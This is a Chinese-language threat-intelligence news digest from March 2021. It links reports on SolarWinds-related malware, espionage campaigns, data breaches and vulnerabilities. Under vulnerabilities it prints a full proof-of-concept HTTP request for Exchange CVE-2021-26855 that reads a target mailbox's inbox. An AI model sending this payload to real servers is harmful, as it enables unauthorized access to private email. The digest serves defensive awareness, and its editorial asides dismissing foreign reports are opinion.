2021年5月29日04:08:45评论93 views字数 3661阅读12分12秒阅读模式

今日威胁情报2021/3/4-6(第355期）

高级威胁分析
今日威胁情报2021/3/4-6(第355期）

1、微软GoldMax，GoldFinder和Sibot的恶意软件与SolarWinds的供应链攻击事件相关。火眼也发布了相关恶意软件分析。

今日威胁情报2021/3/4-6(第355期）

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html

2、针对阿联酋和科威特政府机构的网络间谍活动

今日威胁情报2021/3/4-6(第355期）

https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies

3、神秘网络犯罪组织，针对欧洲，亚洲和北美的工业组织作为信息盗窃活动的一部分。恶意软件包括：除了AZORult，还使用诸如AgentTesla，Formbook，Masslogger和Matiex之类的信息窃取恶意软件

今日威胁情报2021/3/4-6(第355期）

https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf

技术分享
今日威胁情报2021/3/4-6(第355期）

1、WEB渗透技术

https://www.xmind.net/m/2QyGbx/#

2、来自netlab 发布的利用QNAP NAS 设备命令执行漏洞挖矿攻击

https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/

netlab另一个gafgtyt僵尸网络报告

https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/

3、Remote Code Exection Exploit for CVE-2020-1350, SigRed.

今日威胁情报2021/3/4-6(第355期）

https://www.bleepingcomputer.com/news/security/windows-dns-sigred-bug-gets-first-public-rce-poc-exploit/

https://www.graplsecurity.com/post/anatomy-of-an-exploit-rce-with-cve-2020-1350-sigred

https://github.com/chompie1337/SIGRed_RCE_PoC

数据泄露
今日威胁情报2021/3/4-6(第355期）

1、俄罗斯黑客论坛数据泄露，涉及2月的Crdclub和3月的Exploit和Maza。

今日威胁情报2021/3/4-6(第355期）

https://www.flashpoint-intel.com/blog/breelite-cybercrime-forum-maza-breached-by-unknown-attacker/

2、航空IT公司SITA的数据泄露影响了多家航空公司，SITA是一家专门从事航空运输通信和IT的跨国公司，存储在SITA旅客服务系统（PSS）Inc.服务器上的某些旅客数据发生泄露（被黑了），该公司为航空公司运营旅客处理系统。

https://www.sita.aero/pressroom/news-releases/sita-statement-about-security-incident/

漏洞相关
今日威胁情报2021/3/4-6(第355期）

1、Linux内核中修补的特权升级错误，本地提权

https://seclists.org/oss-sec/2021/q1/107

2、VMware 的View Planner RCE漏洞修复程序

https://nvd.nist.gov/vuln/detail/CVE-2021-21978

3、CVE-2021-26855 POC

POST /ecp/poc-2021-26855.js HTTP/1.1Host: <target>User-Agent: Mozilla/5.0Cookie: X-BEResource=<Target's FQDN>/EWS/Exchange.asmx?a=~1942062522;Connection: closeUpgrade-Insecure-Requests: 1Content-Type: text/xmlContent-Length: 845
<?xml version='1.0' encoding='utf-8'?><soap:Envelope xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' xmlns:t='http://schemas.microsoft.com/exchange/services/2006/types' xmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages' xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'>  <soap:Header>      <t:RequestServerVersion Version="Exchange2016" />  </soap:Header>  <soap:Body>    <m:FindItem Traversal='Shallow'>      <m:ItemShape>        <t:BaseShape>AllProperties</t:BaseShape>      </m:ItemShape>      <m:ParentFolderIds>        <t:DistinguishedFolderId Id='inbox'>          <t:Mailbox>            <t:EmailAddress>[email protected]</t:EmailAddress>          </t:Mailbox>        </t:DistinguishedFolderId>      </m:ParentFolderIds>    </m:FindItem>  </soap:Body></soap:Envelope>

https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09

网络战与网络情报
今日威胁情报2021/3/4-6(第355期）

1、立陶宛安全报告：

立陶宛维尔纽斯（美联社）-立陶宛情报部门周四的一份报告称，与俄罗斯情报有关的黑客组织去年对立陶宛高级官员和决策者进行了网络攻击，并利用波罗的海国家的技术基础设施作为打击其他地方目标的基础。

年度国家安全威胁评估报告声称，除其他外，俄罗斯网络间谍组织APT29涉嫌与俄罗斯情报服务有联系，“利用”立陶宛的信息技术基础设施“对来自外国的攻击进行APT29攻击，这些外国实体正在开发COVID-19疫苗。

https://apnews.com/article/lithuania-coronavirus-pandemic-covid-19-pandemic-national-security-russia-4f643495296f645e8957594034ec0367

2、这一定是外媒抹黑：

Russian and Chinese hackers gained access to EMA

https://www.volkskrant.nl/nieuws-achtergrond/russian-and-chinese-hackers-gained-access

-to-ema~bdc61ba59/?referrer=https%3A%2F%2Ft.co%2F

3、这也是外媒抹黑：Chinese Hacking Spree Hit an ‘Astronomical’ Number of Victims

https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/

4、美国国家安全局和国土安全部的网络安全与基础设施安全局（CISA）本周发布了有关保护DNS（PDNS）的联合指南。

https://media.defense.gov/2021/Mar/03/2002593055/-1/-1/0/CSI_PROTECTIVE%20DNS_UOO117652-21.PDF

5、2021年国家威胁评估。

https://www.vsd.lt/wp-content/uploads/2021/03/2021-EN-el_.pdf

今日威胁情报2021/3/4-6(第355期）

本文始发于微信公众号（ThreatPage全球威胁情报）：今日威胁情报2021/3/4-6(第355期）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

今日威胁情报2021/3/4-6(第355期）

1、俄罗斯黑客论坛数据泄露，涉及2月的Crdclub和3月的Exploit和Maza。

随着全球紧张局势加剧，针对能源行业的网络威胁激增

俄罗斯黑客借虚假CAPTCHA传播新型恶意软件LOSTKEYS，高价值目标面临数据窃取危机

网安原创文章推荐【2025/5/8】

曹县恶意软件 OtterCookie 升级，新增 Windows、Linux 和 macOS 功能

网络犯罪分子使用CoGUI钓鱼工具包攻击日本

谷歌警告：俄 APT 组织Star Blizzard利用 ClickFix 部署新型 LostKeys 恶意软件

思科发布IOS XE无线控制器中的关键漏洞更新

LockBit勒索软件运营网站遭入侵，内部数据库遭泄露

开始菜单跳转列表失效谜案告破！微软静默修复，详解幕后 CFR 机制利弊

【暗网快讯】20250509期

发表评论

在线咨询

微信